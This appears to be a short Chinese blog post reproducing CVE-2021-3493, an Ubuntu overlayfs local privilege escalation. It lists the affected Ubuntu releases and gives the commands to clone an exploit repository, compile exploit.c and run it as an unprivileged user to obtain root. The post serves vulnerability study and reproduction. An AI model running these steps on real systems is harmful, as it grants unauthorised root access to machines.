CVE-2021-3493 Linux kernel特权提升漏洞复现

漏洞介绍

Ubuntu附带了一个允许非特权的overlayfs挂载的补丁,因此本地攻击者可以使用它来提权。

影响版本

Ubuntu 20.10
Ubuntu 20.04 LTS
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 ESM

测试环境

root@ubuntu20:~# cat /etc/issue
Ubuntu 20.04.1 LTS \n \l

漏洞复现

切换到user用户下,下载脚本文件
$ git clone https://g.huaxi.us/briskets/CVE-2021-3493.git
编译文件
$ gcc exploit.c -o exploit
执行
$ ./exploit
已经获得root身份

标签